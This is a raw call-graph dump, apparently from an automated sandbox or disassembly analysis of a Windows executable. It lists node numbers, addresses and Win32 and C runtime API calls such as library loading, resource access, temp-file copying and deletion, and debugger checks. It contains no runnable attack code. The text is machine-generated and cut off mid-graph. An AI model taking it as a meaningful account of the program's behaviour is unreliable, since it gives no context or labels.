__lseeki64 58 API calls 105185->105189 105187 875c7b 105186->105187 105187->105127 105188->105127 105190 875cb0 105189->105190 105191 868db6 __lseeki64 9 API calls 105190->105191 105191->105187 105192->105115 105193->105122 105194->105142 105195->105121 105196->105128 105197->105142 105198->105119 105199->105136 105200->105167 105201->105159 105202->105142 105203->105142 105204->105148 105205->105142 105207 86c600 IsProcessorFeaturePresent 105206->105207 105208 86c5fe 105206->105208 105210 87590a 105207->105210 105208->105114 105211 8758b9 ___raise_securityfailure 5 API calls 105210->105211 105212 8759ed 105211->105212 105212->105114 105213->105040 105214->105042 105238 86d4c3 105215->105238 105217 870b41 105251 86d43d 59 API calls __lseeki64 105217->105251 105219 870aeb 105219->105217 105220 870b1f 105219->105220 105223 86d4c3 __lseek_nolock 58 API calls 105219->105223 105220->105217 105221 86d4c3 __lseek_nolock 58 API calls 105220->105221 105224 870b2b CloseHandle 105221->105224 105222 870b49 105225 870b6b 105222->105225 105252 868b07 58 API calls 2 library calls 105222->105252 105226 870b16 105223->105226 105224->105217 105227 870b37 GetLastError 105224->105227 105225->105067 105229 86d4c3 __lseek_nolock 58 API calls 105226->105229 105227->105217 105229->105220 105230->105051 105231->105065 105232->105054 105233->105067 105234->105065 105235->105054 105236->105060 105237->105065 105239 86d4e3 105238->105239 105240 86d4ce 105238->105240 105244 86d508 105239->105244 105255 868af4 58 API calls __getptd_noexit 105239->105255 105253 868af4 58 API calls __getptd_noexit 105240->105253 105243 86d4d3 105254 868b28 58 API calls __getptd_noexit 105243->105254 105244->105219 105245 86d512 105256 868b28 58 API calls __getptd_noexit 105245->105256 105247 86d4db 105247->105219 105249 86d51a 105257 868db6 9 API calls __lseeki64 105249->105257 105251->105222 105252->105225 105253->105243 105254->105247 105255->105245 105256->105249 105257->105247 105259 8a3c3e 105258->105259 105260 8a4475 FindFirstFileW 105258->105260 105259->104697 105260->105259 105261 8a448a FindClose 105260->105261 105261->105259 105477 844bb5 105262->105477 105267 87d8e6 105270 844e4a 84 API calls 105267->105270 105268 844e08 LoadLibraryExW 105487 844b6a 105268->105487 105272 87d8ed 105270->105272 105274 844b6a 3 API calls 105272->105274 105275 87d8f5 105274->105275 105513 844f0b 105275->105513 105276 844e2f 105276->105275 105277 844e3b 105276->105277 105279 844e4a 84 API calls 105277->105279 105281 844e40 105279->105281 105281->104877 105281->104880 105283 87d91c 105521 844ec7 105283->105521 105287 847667 59 API calls 105286->105287 105288 8445b1 105287->105288 105289 847667 59 API calls 105288->105289 105290 8445b9 105289->105290 105291 847667 59 API calls 105290->105291 105292 8445c1 105291->105292 105293 847667 59 API calls 105292->105293 105294 8445c9 105293->105294 105295 87d4d2 105294->105295 105296 8445fd 105294->105296 105297 848047 59 API calls 105295->105297 105298 84784b 59 API calls 105296->105298 105299 87d4db 105297->105299 105300 84460b 105298->105300 105707 847d8c 105299->105707 105703 847d2c 105300->105703 105303 844615 105305 844640 105303->105305 105306 84784b 59 API calls 105303->105306 105304 844680 105690 84784b 105304->105690 105305->105304 105308 84465f 105305->105308 105318 87d4fb 105305->105318 105309 844636 105306->105309 105310 8479f2 59 API calls 105308->105310 105313 847d2c 59 API calls 105309->105313 105315 844669 105310->105315 105311 844691 105316 8446a3 105311->105316 105319 848047 59 API calls 105311->105319 105312 87d5cb 105314 847bcc 59 API calls 105312->105314 105313->105305 105332 87d588 105314->105332 105315->105304 105323 84784b 59 API calls 105315->105323 105317 8446b3 105316->105317 105320 848047 59 API calls 105316->105320 105322 8446ba 105317->105322 105324 848047 59 API calls 105317->105324 105318->105312 105321 87d5b4 105318->105321 105331 87d532 105318->105331 105319->105316 105320->105317 105321->105312 105327 87d59f 105321->105327 105325 848047 59 API calls 105322->105325 105334 8446c1 Mailbox 105322->105334 105323->105304 105324->105322 105325->105334 105326 8479f2 59 API calls 105326->105332 105330 847bcc 59 API calls 105327->105330 105328 87d590 105329 847bcc 59 API calls 105328->105329 105329->105332 105330->105332 105331->105328 105335 87d57b 105331->105335 105332->105304 105332->105326 105711 847924 59 API calls 2 library calls 105332->105711 105334->104910 105336 847bcc 59 API calls 105335->105336 105336->105332 105338 847e4f 59 API calls 105337->105338 105339 8479fd 105338->105339 105339->104916 105339->104918 105341 847b40 105340->105341 105342 87ec6b 105340->105342 105713 847a51 105341->105713 105719 897bdb 59 API calls _memmove 105342->105719 105345 847b4c 105345->104925 105346 87ec75 105347 848047 59 API calls 105346->105347 105348 87ec7d Mailbox 105347->105348 105350 8a408d 105349->105350 105351 8a4092 105350->105351 105352 8a40a0 105350->105352 105353 848047 59 API calls 105351->105353 105354 847667 59 API calls 105352->105354 105355 8a409b Mailbox 105353->105355 105356 8a40a8 105354->105356 105355->104934 105357 847667 59 API calls 105356->105357 105358 8a40b0 105357->105358 105359 847667 59 API calls 105358->105359 105360 8a40bb 105359->105360 105361 847667 59 API calls 105360->105361 105362 8a40c3 105361->105362 105363 847667 59 API calls 105362->105363 105364 8a40cb 105363->105364 105365 847667 59 API calls 105364->105365 105366 8a40d3 105365->105366 105367 847667 59 API calls 105366->105367 105368 8a40db 105367->105368 105369 847667 59 API calls 105368->105369 105370 8a40e3 105369->105370 105371 84459b 59 API calls 105370->105371 105372 8a40fa 105371->105372 105373 84459b 59 API calls 105372->105373 105374 8a4113 105373->105374 105375 8479f2 59 API calls 105374->105375 105376 8a411f 105375->105376 105377 8a4132 105376->105377 105378 847d2c 59 API calls 105376->105378 105379 8479f2 59 API calls 105377->105379 105378->105377 105380 8a413b 105379->105380 105381 8a414b 105380->105381 105382 847d2c 59 API calls 105380->105382 105383 848047 59 API calls 105381->105383 105382->105381 105384 8a4157 105383->105384 105385 847b2e 59 API calls 105384->105385 105386 8a4163 105385->105386 105720 8a4223 59 API calls 105386->105720 105388 8a4172 105721 8a4223 59 API calls 105388->105721 105390 8a4185 105391 8479f2 59 API calls 105390->105391 105392 8a418f 105391->105392 105393 8a41a6 105392->105393 105394 8a4194 105392->105394 105396 8479f2 59 API calls 105393->105396 105395 847cab 59 API calls 105394->105395 105397 8a41a1 105395->105397 105398 8a41af 105396->105398 105401 847b2e 59 API calls 105397->105401 105399 8a41cd 105398->105399 105400 847cab 59 API calls 105398->105400 105402 847b2e 59 API calls 105399->105402 105400->105397 105401->105399 105402->105355 105404 8a9162 __ftell_nolock 105403->105404 105405 860db6 Mailbox 59 API calls 105404->105405 105406 8a91bf 105405->105406 105407 84522e 59 API calls 105406->105407 105408 8a91c9 105407->105408 105409 8a8f5f GetSystemTimeAsFileTime 105408->105409 105410 8a91d4 105409->105410 105411 844ee5 85 API calls 105410->105411 105412 8a91e7 _wcscmp 105411->105412 105413 8a920b 105412->105413 105414 8a92b8 105412->105414 105739 8a9734 105413->105739 105416 8a9734 96 API calls 105414->105416 105431 8a9284 _wcscat 105416->105431 105419 844f0b 74 API calls 105421 8a92dd 105419->105421 105420 8a92c1 105420->104941 105422 844f0b 74 API calls 105421->105422 105424 8a92ed 105422->105424 105423 8a9239 _wcscat _wcscpy 105746 8640fb 58 API calls __wsplitpath_helper 105423->105746 105425 844f0b 74 API calls 105424->105425 105427 8a9308 105425->105427 105428 844f0b 74 API calls 105427->105428 105429 8a9318 105428->105429 105430 844f0b 74 API calls 105429->105430 105432 8a9333 105430->105432 105431->105419 105431->105420 105433 844f0b 74 API calls 105432->105433 105434 8a9343 105433->105434 105435 844f0b 74 API calls 105434->105435 105436 8a9353 105435->105436 105437 844f0b 74 API calls 105436->105437 105438 8a9363 105437->105438 105722 8a98e3 GetTempPathW GetTempFileNameW 105438->105722 105440 8a936f 105441 86525b 115 API calls 105440->105441 105442 8a9380 105441->105442 105442->105420 105445 844f0b 74 API calls 105442->105445 105455 8a943a 105442->105455 105723 864863 105442->105723 105443 8653a6 __fcloseall 83 API calls 105444 8a9445 105443->105444 105446 8a944b DeleteFileW 105444->105446 105447 8a945f 105444->105447 105445->105442 105446->105420 105448 8a9505 CopyFileW 105447->105448 105452 8a9469 _wcsncpy 105447->105452 105449 8a951b DeleteFileW 105448->105449 105450 8a952d DeleteFileW 105448->105450 105449->105420 105736 8a98a2 CreateFileW 105450->105736 105747 8a8b06 116 API calls __fcloseall 105452->105747 105455->105443 105456 8a94f0 105456->105450 105457 8a94f4 DeleteFileW 105456->105457 105457->105420 105458->104867 105460 847cbf 105459->105460 105461 87ed4a 105459->105461 105766 847c50 105460->105766 105462 848029 59 API calls 105461->105462 105465 87ed55 __wsetenvp _memmove 105462->105465 105464 847cca 105464->104901 105466->104903 105467->104917 105469 847c45 105468->105469 105470 847bd8 __wsetenvp 105468->105470 105471 847d2c 59 API calls 105469->105471 105472 847c13 105470->105472 105473 847bee 105470->105473 105476 847bf6 _memmove 105471->105476 105474 848029 59 API calls 105472->105474 105771 847f27 59 API calls Mailbox 105473->105771 105474->105476 105476->104926 105526 844c03 105477->105526 105480 844bdc 105482 844bf5 105480->105482 105483 844bec FreeLibrary 105480->105483 105481 844c03 2 API calls 105481->105480 105484 86525b 105482->105484 105483->105482 105530 865270 105484->105530 105486 844dfc 105486->105267 105486->105268 105611 844c36 105487->105611 105490 844b8f 105492 844ba1 FreeLibrary 105490->105492 105493 844baa 105490->105493 105491 844c36 2 API calls 105491->105490 105492->105493 105494 844c70 105493->105494 105495 860db6 Mailbox 59 API calls 105494->105495 105496 844c85 105495->105496 105615 84522e 105496->105615 105498 844c91 _memmove 105499 844ccc 105498->105499 105500 844dc1 105498->105500 105501 844d89 105498->105501 105502 844ec7 69 API calls 105499->105502 105629 8a991b 95 API calls 105500->105629 105618 844e89 CreateStreamOnHGlobal 105501->105618 105512 844cd5 105502->105512 105505 844f0b 74 API calls 105505->105512 105507 844d69 105507->105276 105508 87d8a7 105509 844ee5 85 API calls 105508->105509 105510 87d8bb 105509->105510 105511 844f0b 74 API calls 105510->105511 105511->105507 105512->105505 105512->105507 105512->105508 105624 844ee5 105512->105624 105514 844f1d 105513->105514 105515 87d9cd 105513->105515 105647 8655e2 105514->105647 105518 8a9109 105667 8a8f5f 105518->105667 105520 8a911f 105520->105283 105522 844ed6 105521->105522 105523 87d990 105521->105523 105672 865c60 105522->105672 105525 844ede 105527 844bd0 105526->105527 105528 844c0c LoadLibraryA 105526->105528 105527->105480 105527->105481 105528->105527 105529 844c1d GetProcAddress 105528->105529 105529->105527 105533 86527c __lseeki64 105530->105533 105531 86528f 105579 868b28 58 API calls __getptd_noexit 105531->105579 105533->105531 105535 8652c0 105533->105535 105534 865294 105580 868db6 9 API calls __lseeki64 105534->105580 105549 8704e8 105535->105549 105538 8652c5 105539 8652ce 105538->105539 105540 8652db 105538->105540 105581 868b28 58 API calls __getptd_noexit 105539->105581 105541 865305 105540->105541 105542 8652e5 105540->105542 105564 870607 105541->105564 105582 868b28 58 API calls __getptd_noexit 105542->105582 105546 86529f __lseeki64 @_EH4_CallFilterFunc@8 105546->105486 105550 8704f4 __lseeki64 105549->105550 105551 869c0b __lock 58 API calls 105550->105551 105562 870502 105551->105562 105552 870576 105584 8705fe 105552->105584 105553 87057d 105589 86881d 58 API calls 2 library calls 105553->105589 105556 8705f3 __lseeki64 105556->105538 105557 870584 105557->105552 105590 869e2b InitializeCriticalSectionAndSpinCount 105557->105590 105559 869c93 __mtinitlocknum 58 API calls 105559->105562 105561 8705aa EnterCriticalSection 105561->105552 105562->105552 105562->105553 105562->105559 105587 866c50 59 API calls __lock 105562->105587 105588 866cba LeaveCriticalSection LeaveCriticalSection _doexit 105562->105588 105572 870627 __wopenfile 105564->105572 105565 870641 105595 868b28 58 API calls __getptd_noexit 105565->105595 105567 870646 105596 868db6 9 API calls __lseeki64 105567->105596 105569 87085f 105592 8785a1 105569->105592 105570 865310 105583 865332 LeaveCriticalSection LeaveCriticalSection _fseek 105570->105583 105572->105565 105578 8707fc 105572->105578 105597 8637cb 60 API calls 2 library calls 105572->105597 105574 8707f5 105574->105578 105598 8637cb 60 API calls 2 library calls 105574->105598 105576 870814 105576->105578 105599 8637cb 60 API calls 2 library calls 105576->105599 105578->105565 105578->105569 105579->105534 105580->105546 105581->105546 105582->105546 105583->105546 105591 869d75 LeaveCriticalSection 105584->105591 105586 870605 105586->105556 105587->105562 105588->105562 105589->105557 105590->105561 105591->105586 105600 877d85 105592->105600 105594 8785ba 105594->105570 105595->105567 105596->105570 105597->105574 105598->105576 105599->105578 105603 877d91 __lseeki64 105600->105603 105601 877da7 105602 868b28 __lseeki64 58 API calls 105601->105602 105604 877dac 105602->105604 105603->105601 105605 877ddd 105603->105605 105606 868db6 __lseeki64 9 API calls 105604->105606 105607 877e4e __wsopen_nolock 109 API calls 105605->105607 105610 877db6 __lseeki64 105606->105610 105608 877df9 105607->105608 105609 877e22 __wsopen_helper LeaveCriticalSection 105608->105609 105609->105610 105610->105594 105612 844b83 105611->105612 105613 844c3f LoadLibraryA 105611->105613 105612->105490 105612->105491 105613->105612 105614 844c50 GetProcAddress 105613->105614 105614->105612 105616 860db6 Mailbox 59 API calls 105615->105616 105617 845240 105616->105617 105617->105498 105619 844ea3 FindResourceExW 105618->105619 105623 844ec0 105618->105623 105620 87d933 LoadResource 105619->105620 105619->105623 105621 87d948 SizeofResource 105620->105621 105620->105623 105622 87d95c LockResource 105621->105622 105621->105623 105622->105623 105623->105499 105625 844ef4 105624->105625 105626 87d9ab 105624->105626 105630 86584d 105625->105630 105628 844f02 105628->105512 105629->105499 105631 865859 __lseeki64 105630->105631 105632 86586b 105631->105632 105633 865891 105631->105633 105643 868b28 58 API calls __getptd_noexit 105632->105643 105635 866c11 __lock_file 59 API calls 105633->105635 105637 865897 105635->105637 105636 865870 105644 868db6 9 API calls __lseeki64 105636->105644 105645 8657be 83 API calls 4 library calls 105637->105645 105640 8658a6 105646 8658c8 LeaveCriticalSection LeaveCriticalSection _fseek 105640->105646 105642 86587b __lseeki64 105642->105628 105643->105636 105644->105642 105645->105640 105646->105642 105650 8655fd 105647->105650 105649 844f2e 105649->105518 105651 865609 __lseeki64 105650->105651 105652 86564c 105651->105652 105653 865644 __lseeki64 105651->105653 105658 86561f _memset 105651->105658 105654 866c11 __lock_file 59 API calls 105652->105654 105653->105649 105655 865652 105654->105655 105665 86541d 72 API calls 6 library calls 105655->105665 105663 868b28 58 API calls __getptd_noexit 105658->105663 105659 865639 105664 868db6 9 API calls __lseeki64 105659->105664 105660 865668 105666 865686 LeaveCriticalSection LeaveCriticalSection _fseek 105660->105666 105663->105659 105664->105653 105665->105660 105666->105653 105670 86520a GetSystemTimeAsFileTime 105667->105670 105669 8a8f6e 105669->105520 105671 865238 __aulldiv 105670->105671 105671->105669 105673 865c6c __lseeki64 105672->105673 105674 865c93 105673->105674 105675 865c7e 105673->105675 105677 866c11 __lock_file 59 API calls 105674->105677 105686 868b28 58 API calls __getptd_noexit 105675->105686 105679 865c99 105677->105679 105678 865c83 105687 868db6 9 API calls __lseeki64 105678->105687 105688 8658d0 67 API calls 5 library calls 105679->105688 105682 865ca4 105689 865cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105682->105689 105684 865cb6 105685 865c8e __lseeki64 105684->105685 105685->105525 105686->105678 105687->105685 105688->105682 105689->105684 105691 8478b7 105690->105691 105692 84785a 105690->105692 105693 847d2c 59 API calls 105691->105693 105692->105691 105694 847865 105692->105694 105699 847888 _memmove 105693->105699 105695 847880 105694->105695 105696 87eb09 105694->105696 105712 847f27 59 API calls Mailbox 105695->105712 105698 848029 59 API calls 105696->105698 105700 87eb13 105698->105700 105699->105311 105701 860db6 Mailbox 59 API calls 105700->105701 105702 87eb33 105701->105702 105704 847d3a 105703->105704 105706 847d43 _memmove 105703->105706 105705 847e4f 59 API calls 105704->105705 105704->105706 105705->105706 105706->105303 105708 847da6 105707->105708 105709 847d99 105707->105709 105710 860db6 Mailbox 59 API calls 105708->105710 105709->105305 105710->105709 105711->105332 105712->105699 105714 847a85 _memmove 105713->105714 105715 847a5f 105713->105715 105714->105345 105715->105714 105716 860db6 Mailbox 59 API calls 105715->105716 105717 847ad4 105716->105717 105718 860db6 Mailbox 59 API calls 105717->105718 105718->105714 105719->105346 105720->105388 105721->105390 105722->105440 105724 86486f __lseeki64 105723->105724 105725 8648a5 105724->105725 105726 86488d 105724->105726 105729 86489d __lseeki64 105724->105729 105727 866c11 __lock_file 59 API calls 105725->105727 105760 868b28 58 API calls __getptd_noexit 105726->105760 105730 8648ab 105727->105730 105729->105442 105748 86470a 105730->105748 105731 864892 105761 868db6 9 API calls __lseeki64 105731->105761 105737 8a98c8 SetFileTime CloseHandle 105736->105737 105738 8a98de 105736->105738 105737->105738 105738->105420 105742 8a9748 __tzset_nolock _wcscmp 105739->105742 105740 8a9109 GetSystemTimeAsFileTime 105740->105742 105741 8a9210 105741->105420 105745 8640fb 58 API calls __wsplitpath_helper 105741->105745 105742->105740 105742->105741 105743 844f0b 74 API calls 105742->105743 105744 844ee5 85 API calls 105742->105744 105743->105742 105744->105742 105745->105423 105746->105431 105747->105456 105751 864719 105748->105751 105755 864737 105748->105755 105749 864727 105763 868b28 58 API calls __getptd_noexit 105749->105763 105751->105749 105751->105755 105758 864751 _memmove 105751->105758 105752 86472c 105764 868db6 9 API calls __lseeki64 105752->105764 105762 8648dd LeaveCriticalSection LeaveCriticalSection _fseek 105755->105762 105756 864a3d __flush 78 API calls 105756->105758 105757 8646e6 __flush 58 API calls 105757->105758 105758->105755 105758->105756 105758->105757 105759 86d886 __write 78 API calls 105758->105759 105765 86ae1e 78 API calls 6 library calls 105758->105765 105759->105758 105760->105731 105761->105729 105762->105729 105763->105752 105764->105755 105765->105758 105767 847c5f __wsetenvp 105766->105767 105768 848029 59 API calls 105767->105768 105769 847c70 _memmove 105767->105769 105770 87ed07 _memmove 105768->105770 105769->105464 105771->105476 105772->104721 105773->104719 105774->104614 105775->104614 105776->104609 105777->104613 105778->104617 105779->104613 105780->104637 105781->104642 105782 867c56 105783 867c62 __lseeki64 105782->105783 105819 869e08 GetStartupInfoW 105783->105819 105785 867c67 105821 868b7c GetProcessHeap 105785->105821 105787 867cbf 105788 867cca 105787->105788 105904 867da6 58 API calls 3 library calls 105787->105904 105822 869ae6 105788->105822 105791 867cd0 105792 867cdb __RTC_Initialize 105791->105792 105905 867da6 58 API calls 3 library calls 105791->105905 105843 86d5d2 105792->105843 105795 867cea 105796 867cf6 GetCommandLineW 105795->105796 105906 867da6 58 API calls 3 library calls 105795->105906 105862 874f23 GetEnvironmentStringsW 105796->105862 105800 867cf5 105800->105796 105802 867d10 105803 867d1b 105802->105803 105907 8630b5 58 API calls 3 library calls 105802->105907 105872 874d58 105803->105872 105806 867d21 105807 867d2c 105806->105807 105908 8630b5 58 API calls 3 library calls 105806->105908 105886 8630ef 105807->105886 105810 867d34 105811 867d3f __wwincmdln 105810->105811 105909 8630b5 58 API calls 3 library calls 105810->105909 105892 8447d0 105811->105892 105814 867d53 105815 867d62 105814->105815 105910 863358 58 API calls _doexit 105814->105910 105911 8630e0 58 API calls _doexit 105815->105911 105818 867d67 __lseeki64 105820 869e1e 105819->105820 105820->105785 105821->105787 105912 863187 36 API calls 2 library calls 105822->105912 105824 869aeb 105913 869d3c InitializeCriticalSectionAndSpinCount __ioinit 105824->105913 105826 869af0 105827 869af4 105826->105827 105915 869d8a TlsAlloc 105826->105915 105914 869b5c 61 API calls 2 library calls 105827->105914 105830 869af9 105830->105791 105831 869b06 105831->105827 105832 869b11 105831->105832 105916 8687d5 105832->105916 105835 869b53 105924 869b5c 61 API calls 2 library calls 105835->105924 105838 869b32 105838->105835 105840 869b38 105838->105840 105839 869b58 105839->105791 105923 869a33 58 API calls 4 library calls 105840->105923 105842 869b40 GetCurrentThreadId 105842->105791 105844 86d5de __lseeki64 105843->105844 105845 869c0b __lock 58 API calls 105844->105845 105846 86d5e5 105845->105846 105847 8687d5 __calloc_crt 58 API calls 105846->105847 105848 86d5f6 105847->105848 105849 86d661 GetStartupInfoW 105848->105849 105850 86d601 __lseeki64 @_EH4_CallFilterFunc@8 105848->105850 105856 86d676 105849->105856 105859 86d7a5 105849->105859 105850->105795 105851 86d86d 105938 86d87d LeaveCriticalSection _doexit 105851->105938 105853 8687d5 __calloc_crt 58 API calls 105853->105856 105854 86d7f2 GetStdHandle 105854->105859 105855 86d805 GetFileType 105855->105859 105856->105853 105857 86d6c4 105856->105857 105856->105859 105858 86d6f8 GetFileType 105857->105858 105857->105859 105936 869e2b InitializeCriticalSectionAndSpinCount 105857->105936 105858->105857 105859->105851 105859->105854 105859->105855 105937 869e2b InitializeCriticalSectionAndSpinCount 105859->105937 105863 874f34 105862->105863 105864 867d06 105862->105864 105939 86881d 58 API calls 2 library calls 105863->105939 105868 874b1b GetModuleFileNameW 105864->105868 105866 874f5a _memmove 105867 874f70 FreeEnvironmentStringsW 105866->105867 105867->105864 105869 874b4f _wparse_cmdline 105868->105869 105871 874b8f _wparse_cmdline 105869->105871 105940 86881d 58 API calls 2 library calls 105869->105940 105871->105802 105873 874d71 __wsetenvp 105872->105873 105877 874d69 105872->105877 105874 8687d5 __calloc_crt 58 API calls 105873->105874 105882 874d9a __wsetenvp 105874->105882 105875 874df1 105876 862d55 _free 58 API calls 105875->105876 105876->105877 105877->105806 105878 8687d5 __calloc_crt 58 API calls 105878->105882 105879 874e16 105880 862d55 _free 58 API calls 105879->105880 105880->105877 105882->105875 105882->105877 105882->105878 105882->105879 105883 874e2d 105882->105883 105941 874607 58 API calls __lseeki64 105882->105941 105942 868dc6 IsProcessorFeaturePresent 105883->105942 105885 874e39 105885->105806 105888 8630fb __IsNonwritableInCurrentImage 105886->105888 105957 86a4d1 105888->105957 105889 863119 __initterm_e 105890 862d40 __cinit 67 API calls 105889->105890 105891 863138 __cinit __IsNonwritableInCurrentImage 105889->105891 105890->105891 105891->105810 105893 8447ea 105892->105893 105903 844889 105892->105903 105894 844824 IsThemeActive 105893->105894 105960 86336c 105894->105960 105898 844850 105972 8448fd SystemParametersInfoW SystemParametersInfoW 105898->105972 105900 84485c 105973 843b3a 105900->105973 105902 844864 SystemParametersInfoW 105902->105903 105903->105814 105904->105788 105905->105792 105906->105800 105910->105815 105911->105818 105912->105824 105913->105826 105914->105830 105915->105831 105918 8687dc 105916->105918 105919 868817 105918->105919 105921 8687fa 105918->105921 105925 8751f6 105918->105925 105919->105835 105922 869de6 TlsSetValue 105919->105922 105921->105918 105921->105919 105933 86a132 Sleep 105921->105933 105922->105838 105923->105842 105924->105839 105926 875201 105925->105926 105927 87521c 105925->105927 105926->105927 105928 87520d 105926->105928 105930 87522c RtlAllocateHeap 105927->105930 105931 875212 105927->105931 105935 8633a1 DecodePointer 105927->105935 105934 868b28 58 API calls __getptd_noexit 105928->105934 105930->105927 105930->105931 105931->105918 105933->105921 105934->105931 105935->105927 105936->105857 105937->105859 105938->105850 105939->105866 105940->105871 105941->105882 105943 868dd1 105942->105943 105948 868c59 105943->105948 105947 868dec 105947->105885 105949 868c73 _memset __call_reportfault 105948->105949 105950 868c93 IsDebuggerPresent 105949->105950 105956 86a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 105950->105956 105952 86c5f6 ___crtMessageBoxW 6 API calls 105954 868d7a 105952->105954 105953 868d57 __call_reportfault 105953->105952 105955 86a140 GetCurrentProcess TerminateProcess 105954->105955 105955->105947 105956->105953 105958 86a4d4 EncodePointer 105957->105958 105958->105958 105959 86a4ee 105958->105959 105959->105889 105961 869c0b __lock 58 API calls 105960->105961 105962 863377 DecodePointer EncodePointer 105961->105962 106025 869d75 LeaveCriticalSection 105962->106025 105964 844849 105965 8633d4 105964->105965 105966 8633de 105965->105966 105967 8633f8 105965->105967 105966->105967 106026 868b28 58 API calls __getptd_noexit 105966->106026 105967->105898 105969 8633e8 106027 868db6 9 API calls __lseeki64 105969->106027 105971 8633f3 105971->105898 105972->105900 105974 843b47 __ftell_nolock 105973->105974 105975 847667 59 API calls 105974->105975 105976 843b51 GetCurrentDirectoryW 105975->105976 106028 843766 105976->106028 105978 843b7a IsDebuggerPresent 105979 87d272 MessageBoxA 105978->105979 105980 843b88 105978->105980 105983 87d28c 105979->105983 105981 843c61 105980->105981 105980->105983 105984 843ba5 105980->105984 105982 843c68 SetCurrentDirectoryW 105981->105982 105985 843c75 Mailbox 105982->105985 106161 847213 59 API calls Mailbox 105983->106161 106109 847285 105984->106109 105985->105902 105989 843bc3 GetFullPathNameW 105990 847bcc 59 API calls 105989->105990 105992 843bfe 105990->105992 105991 87d29c 105993 87d2b2 SetCurrentDirectoryW 105991->105993 106125 85092d 105992->106125 105993->105985 105996 843c1c 106025->105964 106026->105969 106027->105971 106029 847667 59 API calls 106028->106029 106030 84377c 106029->106030 106170 843d31 106030->106170 106032 84379a 106033 844706 61 API calls 106032->106033 106034 8437ae 106033->106034 106035 847de1 59 API calls 106034->106035 106036 8437bb 106035->106036 106037 844ddd 136 API calls 106036->106037 106038 8437d4 106037->106038 106039 87d173 106038->106039 106040 8437dc Mailbox 106038->106040 106223 8a955b 106039->106223 106044 848047 59 API calls 106040->106044 106043 87d192 106046 862d55 _free 58 API calls 106043->106046 106047 8437ef 106044->106047 106045 844e4a 84 API calls 106045->106043 106048 87d19f 106046->106048 106184 84928a 106047->106184 106050 844e4a 84 API calls 106048->106050 106052 87d1a8 106050->106052 106056 843ed0 59 API calls 106052->106056 106053 847de1 59 API calls 106054 843808 106053->106054 106055 8484c0 69 API calls 106054->106055 106057 84381a Mailbox 106055->106057 106058 87d1c3 106056->106058 106059 847de1 59 API calls 106057->106059 106061 843ed0 59 API calls 106058->106061 106060 843840 106059->106060 106063 8484c0 69 API calls 106060->106063 106062 87d1df 106061->106062 106064 844706 61 API calls 106062->106064 106066 84384f Mailbox 106063->106066 106065 87d204 106064->106065 106067 843ed0 59 API calls 106065->106067 106069 847667 59 API calls 106066->106069 106068 87d210 106067->106068 106070 848047 59 API calls 106068->106070 106071 84386d 106069->106071 106072 87d21e 106070->106072 106187 843ed0 106071->106187 106074 843ed0 59 API calls 106072->106074 106076 87d22d 106074->106076 106083 848047 59 API calls 106076->106083 106078 843887 106078->106052 106079 843891 106078->106079 106080 862efd _W_store_winword 60 API calls 106079->106080 106081 84389c 106080->106081 106081->106058 106082 8438a6 106081->106082 106085 862efd _W_store_winword 60 API calls 106082->106085 106084 87d24f 106083->106084 106086 843ed0 59 API calls 106084->106086 106087 8438b1 106085->106087 106088 87d25c 106086->106088 106087->106062 106089 8438bb 106087->106089 106088->106088 106090 862efd _W_store_winword 60 API calls 106089->106090 106091 8438c6 106090->106091 106091->106076 106092 843907 106091->106092 106094 843ed0 59 API calls 106091->106094 106092->106076 106093 843914 106092->106093 106203 8492ce 106093->106203 106096 8438ea 106094->106096 106098 848047 59 API calls 106096->106098 106100 8438f8 106098->106100 106102 843ed0 59 API calls 106100->106102 106102->106092 106104 84928a 59 API calls 106106 84394f 106104->106106 106105 848ee0 60 API calls 106105->106106 106106->106104 106106->106105 106107 843ed0 59 API calls 106106->106107 106108 843995 Mailbox 106106->106108 106107->106106 106108->105978 106110 847292 __ftell_nolock 106109->106110 106111 87ea22 _memset 106110->106111 106112 8472ab 106110->106112 106114 87ea3e GetOpenFileNameW 106111->106114 106280 844750 106112->106280 106116 87ea8d 106114->106116 106118 847bcc 59 API calls 106116->106118 106120 87eaa2 106118->106120 106120->106120 106122 8472c9 106308 84686a 106122->106308 106126 85093a __ftell_nolock 106125->106126 106490 846d80 106126->106490 106128 85093f 106140 843c14 106128->106140 106501 85119e 89 API calls 106128->106501 106130 85094c 106130->106140 106502 853ee7 91 API calls Mailbox 106130->106502 106140->105991 106140->105996 106161->105991 106171 843d3e __ftell_nolock 106170->106171 106172 847bcc 59 API calls 106171->106172 106178 843ea4 Mailbox 106171->106178 106174 843d70 106172->106174 106173 8479f2 59 API calls 106173->106174 106174->106173 106181 843da6 Mailbox 106174->106181 106175 8479f2 59 API calls 106175->106181 106176 843e77 106177 847de1 59 API calls 106176->106177 106176->106178 106180 843e98 106177->106180 106178->106032 106179 847de1 59 API calls 106179->106181 106182 843f74 59 API calls 106180->106182 106181->106175 106181->106176 106181->106178 106181->106179 106258 843f74 106181->106258 106182->106178 106185 860db6 Mailbox 59 API calls 106184->106185 106186 8437fb 106185->106186 106186->106053 106188 843ef3 106187->106188 106189 843eda 106187->106189 106191 847bcc 59 API calls 106188->106191 106190 848047 59 API calls 106189->106190 106192 843879 106190->106192 106191->106192 106193 862efd 106192->106193 106194 862f7e 106193->106194 106195 862f09 106193->106195 106266 862f90 60 API calls 3 library calls 106194->106266 106202 862f2e 106195->106202 106264 868b28 58 API calls __getptd_noexit 106195->106264 106198 862f8b 106198->106078 106199 862f15 106265 868db6 9 API calls __lseeki64 106199->106265 106201 862f20 106201->106078 106202->106078 106204 8492d6 106203->106204 106205 860db6 Mailbox 59 API calls 106204->106205 106206 8492e4 106205->106206 106207 843924 106206->106207 106267 8491fc 59 API calls Mailbox 106206->106267 106209 849050 106207->106209 106268 849160 106209->106268 106211 860db6 Mailbox 59 API calls 106213 843932 106211->106213 106212 84905f 106212->106211 106212->106213 106214 848ee0 106213->106214 106215 87f17c 106214->106215 106217 848ef7 106214->106217 106215->106217 106278 848bdb 59 API calls Mailbox 106215->106278 106218 848fff 106217->106218 106219 849040 106217->106219 106220 848ff8 106217->106220 106218->106106 106277 849d3c 60 API calls Mailbox 106219->106277 106222 860db6 Mailbox 59 API calls 106220->106222 106222->106218 106224 844ee5 85 API calls 106223->106224 106225 8a95ca 106224->106225 106226 8a9734 96 API calls 106225->106226 106227 8a95dc 106226->106227 106228 844f0b 74 API calls 106227->106228 106257 87d186 106227->106257 106229 8a95f7 106228->106229 106230 844f0b 74 API calls 106229->106230 106231 8a9607 106230->106231 106232 844f0b 74 API calls 106231->106232 106233 8a9622 106232->106233 106234 844f0b 74 API calls 